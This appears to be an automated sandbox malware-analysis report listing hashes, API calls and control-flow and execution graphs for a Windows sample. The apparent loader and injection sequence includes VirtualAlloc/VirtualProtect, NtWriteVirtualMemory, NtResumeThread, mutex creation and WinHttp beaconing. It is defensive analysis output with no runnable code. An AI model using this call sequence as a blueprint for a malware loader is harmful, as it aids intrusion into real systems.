          • Instruction ID: 358533fb2e128c2901d80c4f4a4cfb589ac24ede55e7f2f42334dbb3c0a8b6ed
          • Opcode Fuzzy Hash: eda178d3c121a3c0246aa1a68712fd338b248a141ea66084485477232ac8b8b6
          • Instruction Fuzzy Hash: 44E0E5B2A24B858ADB01DF54E84078AB7A4F784798F801015E6CC83B28EB7DC25ACB40
          APIs
          • LdrLoadDll.NTDLL(?,?,?,?,?,?,?,?,10001A56), ref: 1000110F
          • LdrLoadDll.NTDLL ref: 10001160
          Strings
          Memory Dump Source
          • Source File: 00000007.00000003.2462061009.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
          • Associated: 00000007.00000003.2461867937.0000000010006000.00000002.00001000.00020000.00000000.sdmpDownload File
          • Associated: 00000007.00000003.2462011993.0000000010000000.00000002.00001000.00020000.00000000.sdmpDownload File
          • Associated: 00000007.00000003.2462095740.0000000010004000.00000002.00001000.00020000.00000000.sdmpDownload File
          • Associated: 00000007.00000003.2462141371.0000000010005000.00000004.00001000.00020000.00000000.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_7_3_10000000_44qxnhoiecq.jbxd
          Similarity
          • API ID: Load
          • String ID: LdrGetProcedureAddress$LdrLoadDll$MultiByteToWideChar$NtAllocateVirtualMemory$NtClearEvent$NtClose$NtCreateEvent$NtDuplicateObject$NtFreeVirtualMemory$NtProtectVirtualMemory$NtQueryInformationProcess$NtReadVirtualMemory$NtResumeThread$NtSignalAndWaitForSingleObject$NtWriteVirtualMemory$kernel32.dll$kernelbase.dll$ntdll.dll
          • API String ID: 2234796835-2271829017
          • Opcode ID: ed3c4db63ad5cc4b42f47faa611067c77233abd1438de0ab5415474ad8deb5a1
          • Instruction ID: f45f7f1c08eb91b97991e6554cebb749e452b6f3a0b67de9b4da0f7efa5bb01d
          • Opcode Fuzzy Hash: ed3c4db63ad5cc4b42f47faa611067c77233abd1438de0ab5415474ad8deb5a1
          • Instruction Fuzzy Hash: AE7138B5201B4182EA06DB15B8513DA63E1FB887C4F86A439FA8D4732CEFBCD596C744

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 41 6c01c0-6c01ce 42 6c01d0 41->42 43 6c0243-6c0244 41->43 44 6c01d2-6c01d7 42->44 44->43 45 6c01d9-6c01e1 44->45 47 6c01e7-6c01ee 45->47 48 6c01e3 45->48 49 6c01f0-6c01f3 47->49 48->47 49->49 50 6c01f5-6c0209 VirtualProtect 49->50 51 6c020e-6c0211 50->51 52 6c020b 50->52 53 6c0212-6c0215 51->53 52->51 54 6c0217-6c021c 53->54 55 6c0232-6c0241 VirtualProtect 53->55 56 6c021e 54->56 57 6c0222-6c0230 54->57 55->44 56->57 57->53
          APIs
          • VirtualProtect.KERNELBASE(?,?,00000004,?,00000000,?,00000000,?,?,?,00000004,?,?), ref: 006C0201
          • VirtualProtect.KERNELBASE(?,00000000,?,?,?,00000000,?,?,?,00000004,?,?), ref: 006C023A
          Memory Dump Source
          • Source File: 00000007.00000002.2462716197.00000000006C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006C0000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_7_2_6c0000_44qxnhoiecq.jbxd
          Similarity
          • API ID: ProtectVirtual
          • String ID:
          • API String ID: 544645111-0
          • Opcode ID: df0d4710188bbc4545ffb25a3de640365ec90d346391f8a801651d14009fcf39
          • Instruction ID: 894138f083ca20b9b9286852d9137461084fecc0a14fc348a54c43ee1eeb7d0e
          • Opcode Fuzzy Hash: df0d4710188bbc4545ffb25a3de640365ec90d346391f8a801651d14009fcf39
          • Instruction Fuzzy Hash: 6C118C72500210ABEB314E59CC48FBBB7AEEF85720B19451DFD1AE7204D625EE0586A1

          Control-flow Graph

          APIs
          • VirtualAlloc.KERNELBASE(00000000,00000688,00001000,00000040), ref: 006B0065
          Memory Dump Source
          • Source File: 00000007.00000002.2462697570.00000000006B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006B0000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_7_2_6b0000_44qxnhoiecq.jbxd
          Similarity
          • API ID: AllocVirtual
          • String ID:
          • API String ID: 4275171209-0
          • Opcode ID: a2fcc1d63792b2b86ce2226597d373f45588513d77cf013809a06473fc1d853c
          • Instruction ID: 067303ff40845fcfcc47d95c8eb743418814c3733953986777f947e425fb017e
          • Opcode Fuzzy Hash: a2fcc1d63792b2b86ce2226597d373f45588513d77cf013809a06473fc1d853c
          • Instruction Fuzzy Hash: AE01D4B69403086BE7202F70CC04BCB3EAAAB88720F414519F98AA7281DD7899C08B58

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 76 6c05bd-6c05cf VirtualAlloc
          APIs
          • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,006C0093), ref: 006C05CA
          Memory Dump Source
          • Source File: 00000007.00000002.2462716197.00000000006C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006C0000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_7_2_6c0000_44qxnhoiecq.jbxd
          Similarity
          • API ID: AllocVirtual
          • String ID:
          • API String ID: 4275171209-0
          • Opcode ID: a9a4fa599d775aa83550951cd01ab53a510ae55495336f8eeb8bc52accc60b48
          • Instruction ID: 65ce390d9ce214b0b9a70d03eb22b0c205847d94ce1a40b3c250883ace489992
          • Opcode Fuzzy Hash: a9a4fa599d775aa83550951cd01ab53a510ae55495336f8eeb8bc52accc60b48
          • Instruction Fuzzy Hash: EAB012B22C038477EB304E614C0EF8A3661ABC8FA3F350000FB106B1C48AF0E8018624
          APIs
          Strings
          Memory Dump Source
          • Source File: 00000007.00000003.2462061009.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
          • Associated: 00000007.00000003.2461867937.0000000010006000.00000002.00001000.00020000.00000000.sdmpDownload File
          • Associated: 00000007.00000003.2462011993.0000000010000000.00000002.00001000.00020000.00000000.sdmpDownload File
          • Associated: 00000007.00000003.2462095740.0000000010004000.00000002.00001000.00020000.00000000.sdmpDownload File
          • Associated: 00000007.00000003.2462141371.0000000010005000.00000004.00001000.00020000.00000000.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_7_3_10000000_44qxnhoiecq.jbxd
          Similarity
          • API ID: MemoryVirtual$CloseObjectReadSignalSingleWait$Write
          • String ID: H$H$H
          • API String ID: 2084818639-1989617792
          • Opcode ID: 8c1ad99cee8b214af55f9319549a430532395830dc3796db70fa6c318a35bef8
          • Instruction ID: d3cf83964699c326543a64d7e9576905f73cd3ca186e7bac4399ed8c9f110ffe
          • Opcode Fuzzy Hash: 8c1ad99cee8b214af55f9319549a430532395830dc3796db70fa6c318a35bef8
          • Instruction Fuzzy Hash: 23412772604B8186EB60CF66F4907AE73A8FB89BC9F515126DE8D43A1CDF35C499CB40

          Execution Graph

          Execution Coverage:9.5%
          Dynamic/Decrypted Code Coverage:0%
          Signature Coverage:1.9%
          Total number of Nodes:1827
          Total number of Limit Nodes:18
          execution_graph 8058 140018168 SetUnhandledExceptionFilter 8059 159f28a0000 8062 159f28a0020 8059->8062 8060 159f28a01a1 8061 159f28a00b1 LdrLoadDll 8061->8062 8062->8060 8062->8061 8063 140017e00 GetStartupInfoW 8064 140017e39 8063->8064 8065 140017e4b 8064->8065 8066 140017e53 Sleep 8064->8066 8067 140017e6b _amsg_exit 8065->8067 8070 140017e75 8065->8070 8066->8064 8067->8070 8068 140017ee7 _initterm 8071 140017f04 8068->8071 8069 140017ec8 8070->8068 8070->8069 8070->8071 8071->8069 8077 140002900 8071->8077 8073 140017faa 8074 140017fb8 exit 8073->8074 8075 140017fc0 8073->8075 8074->8075 8075->8069 8076 140017fc8 _cexit 8075->8076 8076->8069 8078 140002916 8077->8078 8164 14000e2b0 ??2@YAPEAX_K 8078->8164 8082 1400029b8 CoInitializeSecurity 8083 1400029f0 8082->8083 8158 140002a5f 8082->8158 8173 14000c3f0 8083->8173 8084 140003628 8724 14000bd60 8084->8724 8086 1400029f5 CoCreateInstance 8214 1400175a0 8086->8214 8088 140003793 8088->8073 8094 140002aa2 8225 140001080 8094->8225 8095 140002aa9 8473 140001c20 8095->8473 8099 14000377e HeapFree 8099->8088 8100 140002aa7 8100->8158 8287 1400075c0 8100->8287 8103 140002b1b 8308 14000e0c0 8103->8308 8104 140002b13 8489 140005cb0 8104->8489 8108 140002bd7 8324 140004e20 ??2@YAPEAX_K 8108->8324 8112 140002be9 8115 140002c0e 8112->8115 8117 140002bfc HeapFree 8112->8117 8113 140002c36 HeapFree 8114 140002c48 8113->8114 8363 14000caf0 8114->8363 8492 140007740 8115->8492 8117->8115 8119 140002c50 8119->8112 8120 140002c58 8119->8120 8370 1400164d0 8120->8370 8126 140002d3f _time64 8160 140002ce0 8126->8160 8128 140002d83 SleepEx 8130 140004120 34 API calls 8128->8130 8129 140002e03 ??2@YAPEAX_K 8129->8160 8130->8160 8132 140002f19 HeapFree 8132->8160 8134 140002f30 Sleep 8135 140002dd0 8134->8135 8134->8160 8135->8160 8138 140002e89 HeapFree 8138->8160 8139 140002ea2 _time64 8139->8160 8142 140002f02 ??3@YAXPEAX 8142->8160 8144 14000e0c0 memset memcpy 8144->8160 8145 140003210 _time64 8145->8160 8150 140003575 HeapFree 8150->8160 8151 14000caf0 11 API calls 8151->8160 8152 14000359b 8153 1400035c0 8152->8153 8155 1400035ae HeapFree 8152->8155 8156 140007740 43 API calls 8153->8156 8155->8153 8156->8158 8157 14000348f _wtoi 8159 1400034b4 _wtoi 8157->8159 8157->8160 8158->8084 8158->8088 8159->8160 8160->8073 8160->8126 8160->8128 8160->8129 8160->8132 8160->8134 8160->8138 8160->8139 8160->8142 8160->8144 8160->8145 8160->8150 8160->8151 8160->8152 8160->8159 8162 14000343b HeapFree 8160->8162 8163 140003450 _time64 8160->8163 8386 14000a3d0 8160->8386 8430 14000a230 8160->8430 8449 14000d5a0 8160->8449 8456 140004120 8160->8456 8524 140002300 CoCreateInstance 8160->8524 8526 140002660 8160->8526 8549 140002440 8160->8549 8559 1400042f0 8160->8559 8563 14000b420 8160->8563 8571 140005460 8160->8571 8591 140006bf0 WSAStartup 8160->8591 8597 1400043f0 8160->8597 8631 140004c00 8160->8631 8655 140005800 WSAStartup 8160->8655 8675 140015190 8160->8675 8688 140007be0 8160->8688 8703 140003ed0 8160->8703 8162->8163 8163->8160 8165 14000e2e5 memset 8164->8165 8166 14000e2fe 8164->8166 8165->8166 8167 14000e0c0 2 API calls 8166->8167 8168 14000e366 LoadLibraryExW 8166->8168 8170 140002935 SetCurrentDirectoryW GetTickCount srand CoInitializeEx 8166->8170 8167->8166 8168->8166 8169 14000e38c 8168->8169 8171 14000e0c0 2 API calls 8169->8171 8170->8082 8170->8158 8172 14000e3b0 GetProcAddress 8171->8172 8172->8166 8172->8169 8174 14000c428 8173->8174 8175 14000e0c0 2 API calls 8174->8175 8179 14000c6f5 8174->8179 8176 14000c440 LoadLibraryExW 8175->8176 8178 14000c483 8176->8178 8176->8179 8180 14000e0c0 2 API calls 8178->8180 8179->8086 8181 14000c493 LoadLibraryExW 8180->8181 8181->8179 8183 14000c4e3 8181->8183 8184 14000e0c0 2 API calls 8183->8184 8185 14000c4f4 GetProcAddress 8184->8185 8185->8179 8186 14000c516 8185->8186 8187 14000e0c0 2 API calls 8186->8187 8188 14000c527 GetProcAddress 8187->8188 8188->8179 8189 14000c549 8188->8189 8190 14000e0c0 2 API calls 8189->8190 8191 14000c55a GetProcAddress 8190->8191 8191->8179 8192 14000c57c 8191->8192 8193 14000e0c0 2 API calls 8192->8193 8194 14000c58d GetProcAddress 8193->8194 8194->8179 8195 14000c5af 8194->8195 8196 14000e0c0 2 API calls 8195->8196 8197 14000c5c0 GetProcAddress 8196->8197 8197->8179 8198 14000c5e2 8197->8198 8199 14000e0c0 2 API calls 8198->8199 8200 14000c5f3 GetProcAddress 8199->8200 8200->8179 8201 14000c615 8200->8201 8202 14000e0c0 2 API calls 8201->8202 8203 14000c626 GetProcAddress 8202->8203 8203->8179 8204 14000c648 8203->8204 8205 14000e0c0 2 API calls 8204->8205 8206 14000c659 GetProcAddress 8205->8206 8206->8179 8207 14000c677 8206->8207 8208 14000e0c0 2 API calls 8207->8208 8209 14000c688 GetProcAddress 8208->8209 8209->8179 8210 14000c6a6 8209->8210 8211 14000e0c0 2 API calls 8210->8211 8212 14000c6b7 GetProcAddress 8211->8212 8212->8179 8213 14000c6d5 8212->8213 8213->8086 8215 14000e0c0 2 API calls 8214->8215 8216 1400175cf ConvertStringSecurityDescriptorToSecurityDescriptorW 8215->8216 8218 14001762e 8216->8218 8219 14000e0c0 2 API calls 8218->8219 8220 140017670 CreateMutexExW 8219->8220 8222 1400176d3 8220->8222 8223 140002a5b 8222->8223 8224 1400176e5 exit 8222->8224 8223->8094 8223->8095 8223->8158 8224->8223 8226 140001133 8225->8226 8227 14000113f ??2@YAPEAX_K 8226->8227 8229 14000169b 8226->8229 8228 140001154 SysAllocString 8227->8228 8230 140001700 8227->8230 8233 140001174 8228->8233 8231 1400016d6 HeapFree 8229->8231 8232 1400016e9 8229->8232 8231->8232 8232->8100 8234 1400011cb 8233->8234 8235 1400011b3 8233->8235 8236 1400011ad SysFreeString 8233->8236 8234->8229 8765 140001730 8234->8765 8237 1400011c2 ??3@YAXPEAX 8235->8237 8238 1400011bc ??_V@YAXPEAX 8235->8238 8236->8235 8237->8234 8238->8237 8241 14000e0c0 2 API calls 8242 1400011ff 8241->8242 8243 14000e0c0 2 API calls 8242->8243 8244 14000124c VariantInit VariantInit SysAllocString 8243->8244 8246 1400012f5 ??2@YAPEAX_K 8244->8246 8248 1400012ea 8244->8248 8246->8230 8247 140001325 SysAllocString 8246->8247 8249 140001358 ??2@YAPEAX_K 8247->8249 8250 140001348 8247->8250 8248->8246 8249->8230 8251 140001372 SysAllocString 8249->8251 8250->8249 8252 140001392 8251->8252 8253 140001426 8252->8253 8254 140001408 SysFreeString 8252->8254 8255 14000140e 8252->8255 8256 140001458 VariantClear VariantClear VariantClear 8253->8256 8259 14000143a SysFreeString 8253->8259 8260 140001440 8253->8260 8254->8255 8257 140001417 ??_V@YAXPEAX 8255->8257 8258 14000141d ??3@YAXPEAX 8255->8258 8261 140001480 8256->8261 8273 14000168b 8256->8273 8257->8258 8258->8253 8259->8260 8263 140001449 ??_V@YAXPEAX 8260->8263 8264 14000144f ??3@YAXPEAX 8260->8264 8261->8229 8265 140001730 25 API calls 8261->8265 8263->8264 8264->8256 8266 14000149b 8265->8266 8266->8229 8267 14000e0c0 2 API calls 8266->8267 8268 1400014b6 VariantInit VariantInit VariantInit 8267->8268 8807 140001000 ??2@YAPEAX_K 8268->8807 8271 140001554 ??2@YAPEAX_K 8271->8273 8274 14000157b SysAllocString 8271->8274 8804 14000cc50 GetCurrentProcess OpenProcessToken 8273->8804 8275 14000159b 8274->8275 8276 140001608 SysFreeString 8275->8276 8277 14000160e 8275->8277 8282 140001626 8275->8282 8276->8277 8279 140001617 ??_V@YAXPEAX 8277->8279 8280 14000161d ??3@YAXPEAX 8277->8280 8278 14000166b VariantClear VariantClear VariantClear 8278->8229 8279->8280 8280->8282 8281 140001666 8281->8278 8282->8278 8282->8281 8283 140001648 SysFreeString 8282->8283 8284 14000164e 8282->8284 8283->8284 8285 140001657 ??_V@YAXPEAX 8284->8285 8286 14000165d ??3@YAXPEAX 8284->8286 8285->8286 8286->8281 8818 14000d420 8287->8818 8290 14000e0c0 2 API calls 8291 140007646 8290->8291 8292 14000e580 10 API calls 8291->8292 8293 140007651 8292->8293 8823 14000c0c0 8293->8823 8296 140007698 8848 140014e00 8296->8848 8298 1400076a0 8299 14000a3d0 32 API calls 8298->8299 8300 1400076cd _time64 8299->8300 8301 1400076e4 8300->8301 8302 140002af0 ??2@YAPEAX_K 8300->8302 8303 1400076ed HeapFree 8301->8303 8304 1400076ff 8301->8304 8302->8103 8302->8104 8303->8304 8855 14000dc30 8304->8855 8307 14000770d _time64 8307->8302 8309 14000e0dd 8308->8309 8310 140002b38 8309->8310 8311 14000e1e1 memset 8309->8311 8312 14000e1f7 8309->8312 8310->8108 8314 14000e410 8310->8314 8311->8312 8312->8310 8313 14000e27a memcpy 8312->8313 8313->8310 8315 14000e44f 8314->8315 8316 14000e526 8315->8316 8317 14000e0c0 2 API calls 8315->8317 8316->8108 8318 14000e46b 8317->8318 8318->8316 8319 14000e4ec HeapFree 8318->8319 8320 14000e4fe 8318->8320 8319->8320 8321 14000e580 10 API calls 8320->8321 8322 14000e508 8321->8322 8322->8316 8323 14000e510 memcpy 8322->8323 8323->8316 8325 140004e61 ??2@YAPEAX_K 8324->8325 8326 140004e59 8324->8326 8329 140004ea8 8325->8329 8330 140004ea0 8325->8330 8327 140002300 CoCreateInstance 8326->8327 8327->8325 8332 14000e0c0 2 API calls 8329->8332 8331 140002300 CoCreateInstance 8330->8331 8331->8329 8333 140004ee5 8332->8333 8924 140002500 CreateFileW 8333->8924 8336 140004f6f 8338 140004f77 HeapFree 8336->8338 8339 140004f8c 8336->8339 8337 140002440 14 API calls 8337->8336 8338->8339 8340 140004fa7 8339->8340 8961 140005d00 8339->8961 8341 14000e0c0 2 API calls 8340->8341 8347 140004fbe 8341->8347 8344 140005067 8349 140005092 8344->8349 8350 14000507c 8344->8350 8345 140005d00 10 API calls 8346 14000505e ??3@YAXPEAX 8345->8346 8346->8344 8358 14000504d 8347->8358 8976 1400023b0 8347->8976 8348 140002be5 8348->8112 8348->8113 8348->8114 8349->8348 8351 1400050b5 8349->8351 8352 140005d00 10 API calls 8349->8352 8350->8351 8354 140005d00 10 API calls 8350->8354 8934 1400051b0 8351->8934 8355 14000508d ??3@YAXPEAX 8352->8355 8354->8355 8355->8351 8358->8344 8358->8345 8359 14000e0c0 2 API calls 8361 140005131 8359->8361 8958 14000cd70 CreateFileW 8361->8958 8364 14000cafe 8363->8364 8365 14000cbc2 8364->8365 8366 14000e580 10 API calls 8364->8366 8365->8119 8367 14000cb6e 8366->8367 8368 14000cb88 8367->8368 8369 14000cb9b HeapFree 8367->8369 8368->8119 8369->8368 8371 14000e0c0 2 API calls 8370->8371 8373 140016501 8371->8373 8373->8373 8997 14000d0f0 8373->8997 8374 140002c81 _time64 CreateThread 8374->8160 8375 1400165a0 ??2@YAPEAX_K 8384 14001654c 8375->8384 8376 140016664 HeapFree 8376->8374 8377 14001655b 8377->8374 8377->8376 8380 14001664e HeapFree 8377->8380 8380->8377 8384->8375 8384->8377 9013 14000ee80 8384->9013 9016 14000f120 8384->9016 9025 140016690 8384->9025 9039 1400163e0 8384->9039 9043 14000ef60 8384->9043 8387 14000a41c 8386->8387 8388 14000a425 HeapFree 8387->8388 8389 14000a439 8387->8389 8388->8389 8390 14000e0c0 2 API calls 8389->8390 8391 14000a449 CreateFileW 8390->8391 8393 14000a50e 8391->8393 8394 14000a4cc SetFilePointer SetFilePointer 8391->8394 8396 14000a5a3 8393->8396 8397 14000a6a5 8393->8397 8394->8393 8395 14000a514 8394->8395 8398 14000e580 10 API calls 8395->8398 8399 14000bd60 18 API calls 8396->8399 8401 14000a6c4 8397->8401 8402 14000a6af HeapFree 8397->8402 8400 14000a51e 8398->8400 8409 14000a5af 8399->8409 8400->8393 8404 14000a526 ReadFile 8400->8404 8401->8160 8402->8401 8403 14000a5eb 8405 14000e580 10 API calls 8403->8405 8408 14000a69e 8403->8408 8404->8393 8406 14000a558 HeapFree 8404->8406 8407 14000a602 8405->8407 8406->8393 8407->8408 8410 14000a642 8407->8410 8411 14000a6de 8407->8411 8408->8397 8409->8403 8412 14000ce20 12 API calls 8409->8412 8413 14000e580 10 API calls 8410->8413 8414 14000e580 10 API calls 8411->8414 8412->8403 8415 14000a647 8413->8415 8414->8415 8415->8408 8416 14000e0c0 2 API calls 8415->8416 8417 14000a707 8416->8417 8418 140002880 _vsnwprintf 8417->8418 8422 14000a76a 8418->8422 8419 14000a8c4 8419->8408 8420 14000a8c9 HeapFree 8419->8420 8420->8408 8421 14000a7e4 rand 8423 14000a7d9 8421->8423 8422->8419 8422->8423 8423->8421 8424 14000a83a 8423->8424 8425 14000e580 10 API calls 8424->8425 8426 14000a859 8425->8426 8426->8408 8427 14000e0c0 2 API calls 8426->8427 8428 14000a871 8427->8428 8429 14000cd70 2 API calls 8428->8429 8429->8408 8431 14000a258 HeapFree 8430->8431 8432 14000a270 8430->8432 8431->8432 8433 14000e580 10 API calls 8432->8433 8434 14000a279 8433->8434 8435 14000a285 GetAdaptersInfo 8434->8435 8436 14000a3bb 8434->8436 8437 14000a2ab 8435->8437 8438 14000a29f 8435->8438 8436->8160 8437->8436 9416 140006fb0 8437->9416 8440 14000e580 10 API calls 8438->8440 8440->8437 8442 14000a2f0 8442->8160 8443 14000e580 10 API calls 8444 14000a30c 8443->8444 8444->8442 8445 140002880 _vsnwprintf 8444->8445 8446 14000a36b 8444->8446 8445->8444 8447 14000a391 HeapFree 8446->8447 8448 14000a3a6 HeapFree 8446->8448 8447->8448 8448->8436 8450 14000d5c2 WinHttpCloseHandle 8449->8450 8451 14000d5d0 WinHttpConnect 8449->8451 8450->8451 8452 14000d5f7 8451->8452 8453 14000d61c 8451->8453 8454 14000caf0 11 API calls 8452->8454 8453->8160 8455 14000d603 8454->8455 8455->8160 8457 14000e0c0 2 API calls 8456->8457 8458 14000415d 8457->8458 8459 140004176 8458->8459 8461 1400041df ??2@YAPEAX_K 8458->8461 8471 140004245 8458->8471 8459->8160 8460 140004280 HeapFree 8460->8459 8462 1400041f2 8461->8462 8463 1400041fa 8461->8463 8464 140002300 CoCreateInstance 8462->8464 8465 1400023b0 28 API calls 8463->8465 8464->8463 8466 140004224 8465->8466 8467 140004228 _time64 8466->8467 8468 14000424f 8466->8468 8467->8468 8469 140004238 8467->8469 8470 14000426d ??3@YAXPEAX 8468->8470 8468->8471 8469->8471 9424 1400042b0 8469->9424 8470->8471 8471->8459 8471->8460 8474 14000e0c0 2 API calls 8473->8474 8476 140001c69 8474->8476 8475 140001cc5 8475->8100 8476->8475 8477 14000bd60 18 API calls 8476->8477 8478 140001ce5 8477->8478 8479 14000e580 10 API calls 8478->8479 8480 140001e26 8478->8480 8485 140001d09 8479->8485 8481 140001f24 8480->8481 8482 140001f0f HeapFree 8480->8482 8483 140001f29 HeapFree 8481->8483 8484 140001f3e 8481->8484 8482->8481 8483->8484 8484->8100 8485->8480 8486 14000e0c0 2 API calls 8485->8486 8487 140001d57 8486->8487 8487->8480 8488 140001dc7 memset 8487->8488 8488->8480 8490 140002300 CoCreateInstance 8489->8490 8491 140005cbe 8490->8491 8491->8103 8493 140007756 HeapFree 8492->8493 8494 140007768 8492->8494 8493->8494 8495 140007771 HeapFree 8494->8495 8496 140007783 8494->8496 8495->8496 8497 14000778c HeapFree 8496->8497 8498 14000779e 8496->8498 8497->8498 8499 1400077a7 HeapFree 8498->8499 8500 1400077b9 8498->8500 8499->8500 8501 1400077c2 HeapFree 8500->8501 8502 1400077d4 8500->8502 8501->8502 8503 1400077dd HeapFree 8502->8503 8504 1400077ef 8502->8504 8503->8504 9427 14000b390 8504->9427 8525 14000235b 8524->8525 8525->8160 8527 1400027f1 8526->8527 8528 14000269c 8526->8528 8527->8160 9433 140007230 8528->9433 8531 140007230 14 API calls 8534 1400026c7 8531->8534 8532 1400027a6 HeapFree 8533 1400027bd 8532->8533 8535 1400027c2 HeapFree 8533->8535 8536 1400027d7 8533->8536 8547 14000274e 8534->8547 9441 140007340 8534->9441 8535->8536 8536->8527 8537 1400027dc HeapFree 8536->8537 8537->8527 8542 140002763 8544 14000e580 10 API calls 8542->8544 8543 140002738 9463 140007530 8543->9463 8546 14000276c 8544->8546 8546->8547 8548 14000277f memcpy 8546->8548 8547->8532 8547->8533 8548->8547 8550 140002466 8549->8550 8551 1400024f0 8549->8551 8552 14000bf10 11 API calls 8550->8552 8551->8160 8553 14000247b 8552->8553 8554 1400024cc 8553->8554 8555 14000247f SysAllocString 8553->8555 8554->8551 8556 1400024d9 HeapFree 8554->8556 8555->8554 8557 140002497 SysFreeString 8555->8557 8556->8551 8557->8554 8560 14000b420 3 API calls 8559->8560 8561 140004308 ??3@YAXPEAX 8560->8561 8561->8160 8564 14000b438 8563->8564 8565 14000b46a 8563->8565 8564->8565 8570 14000b44d HeapFree 8564->8570 8566 14000b47d HeapFree 8565->8566 8567 14000b48f 8565->8567 8566->8567 8568 14000b49d HeapFree 8567->8568 8569 14000b4af 8567->8569 8568->8569 8569->8160 8570->8564 8572 140005767 8571->8572 8585 1400054a1 8571->8585 8573 14000579a HeapFree 8572->8573 8574 1400057af 8572->8574 8573->8574 8577 1400057e3 8574->8577 8581 1400057c5 SysFreeString 8574->8581 8582 1400057cb 8574->8582 8575 1400054be SysFreeString 8575->8585 8576 1400054e9 ??2@YAPEAX_K 8580 140005504 SysAllocString SysAllocString 8576->8580 8576->8585 8577->8160 8578 1400054d3 ??3@YAXPEAX 8578->8585 8579 1400054cd SysFreeString 8579->8578 8580->8585 8581->8582 8583 1400057d4 SysFreeString 8582->8583 8584 1400057da ??3@YAXPEAX 8582->8584 8583->8584 8584->8577 8585->8572 8585->8575 8585->8576 8585->8578 8585->8579 8586 14000e0c0 memset memcpy 8585->8586 8587 14000e580 10 API calls 8585->8587 8588 140002880 _vsnwprintf 8585->8588 8589 140007ae0 19 API calls 8585->8589 8590 140003e40 266 API calls 8585->8590 8586->8585 8587->8585 8588->8585 8589->8585 8590->8585 8592 140006c33 gethostname 8591->8592 8596 140006c21 8591->8596 8593 140006c59 getaddrinfo 8592->8593 8592->8596 8593->8596 8594 140006cf5 freeaddrinfo 8595 140006cfe WSACleanup 8594->8595 8595->8160 8596->8594 8596->8595 8598 140004408 8597->8598 8599 14000bd60 18 API calls 8598->8599 8600 140004446 8599->8600 8601 140004457 8600->8601 8604 140004858 8600->8604 8602 140002300 CoCreateInstance 8601->8602 8603 140004461 8602->8603 8607 14000e0c0 2 API calls 8603->8607 8609 14000e0c0 2 API calls 8604->8609 8630 1400046ba 8604->8630 8605 140004833 HeapFree 8606 140004848 8605->8606 8606->8160 8608 14000448f 8607->8608 8610 140002500 26 API calls 8608->8610 8618 1400048d3 8609->8618 8612 140004520 8610->8612 8611 1400045b2 HeapFree 8613 1400045c7 8611->8613 8612->8611 8612->8613 8616 14000e0c0 2 API calls 8613->8616 8613->8630 8614 140004b0e 8615 140004b26 8614->8615 8617 14000e580 10 API calls 8614->8617 8619 14000e0c0 2 API calls 8615->8619 8615->8630 8628 140004626 8616->8628 8617->8615 8618->8614 8620 140004a9d 8618->8620 8623 14000e0c0 2 API calls 8618->8623 8618->8630 8619->8630 8621 140004aca HeapFree 8620->8621 8622 140004adc 8620->8622 8620->8630 8621->8622 8624 14000e580 10 API calls 8622->8624 8625 140004a53 8623->8625 8626 140004af5 memcpy 8624->8626 8627 14000ce20 12 API calls 8625->8627 8626->8614 8627->8620 8629 14000e0c0 2 API calls 8628->8629 8628->8630 8629->8630 8630->8605 8630->8606 8632 140004c5b 8631->8632 8633 140004c63 ??2@YAPEAX_K 8632->8633 8636 140004d8d 8632->8636 8634 140004c74 8633->8634 8635 140004c7c 8633->8635 8639 140002300 CoCreateInstance 8634->8639 8643 1400023b0 28 API calls 8635->8643 8637 140004dc4 8636->8637 8640 140004da0 _time64 8636->8640 8638 140004ddf 8637->8638 8644 140005d00 10 API calls 8637->8644 8641 140004de9 HeapFree 8638->8641 8642 140004dfb 8638->8642 8639->8635 8640->8637 8640->8640 8641->8642 8642->8160 8646 140004cc4 8643->8646 8645 140004dd6 ??3@YAXPEAX 8644->8645 8645->8638 8646->8636 8647 14000e0c0 2 API calls 8646->8647 8648 140004cf9 8647->8648 8649 14000cd70 2 API calls 8648->8649 8650 140004d42 8649->8650 8651 1400051b0 26 API calls 8650->8651 8652 140004d4a 8651->8652 8653 140005d00 10 API calls 8652->8653 8654 140004d6c ??3@YAXPEAX 8653->8654 8654->8636 8656 140005a45 8655->8656 8657 14000585c 8655->8657 8659 140005a73 freeaddrinfo 8656->8659 8660 140005a79 8656->8660 8658 14000e580 10 API calls 8657->8658 8661 140005868 8658->8661 8659->8660 8662 140005a93 8660->8662 8663 140005a7e HeapFree 8660->8663 8661->8656 9468 140005ad0 8661->9468 8665 140005ab5 WSACleanup 8662->8665 8666 140005aa0 HeapFree 8662->8666 8663->8662 8665->8160 8666->8665 8667 1400058a5 HeapFree 8674 14000587c 8667->8674 8668 1400058cf freeaddrinfo 8668->8674 8669 14000e0c0 memset memcpy 8669->8674 8670 140005906 8670->8160 8671 140002880 _vsnwprintf 8671->8674 8672 14000bfe0 11 API calls 8672->8674 8673 1400059b8 getaddrinfo 8673->8674 8674->8656 8674->8667 8674->8668 8674->8669 8674->8670 8674->8671 8674->8672 8674->8673 8678 1400151bf 8675->8678 8676 1400151f2 8679 14000e0c0 2 API calls 8676->8679 8677 14000f310 52 API calls 8677->8678 8678->8676 8678->8677 8682 140015309 8678->8682 8680 14001521a 8679->8680 8681 14000d0f0 18 API calls 8680->8681 8683 14001526b 8681->8683 8682->8160 8685 1400152b4 8683->8685 9486 1400167e0 8683->9486 8684 1400152f4 HeapFree 8684->8682 8685->8682 8685->8684 8686 1400152de HeapFree 8685->8686 8686->8685 8689 140007c01 _wtoi 8688->8689 8690 140007bf4 8688->8690 8692 140007c1b 8689->8692 8690->8157 8691 140007c91 8691->8157 8692->8691 8693 140007c77 8692->8693 8694 140007c39 8692->8694 9716 140009300 8693->9716 8696 140007c5d 8694->8696 8698 140007c3e 8694->8698 9581 1400097f0 8696->9581 8698->8691 9570 140009150 8698->9570 8701 140007c65 8701->8157 8704 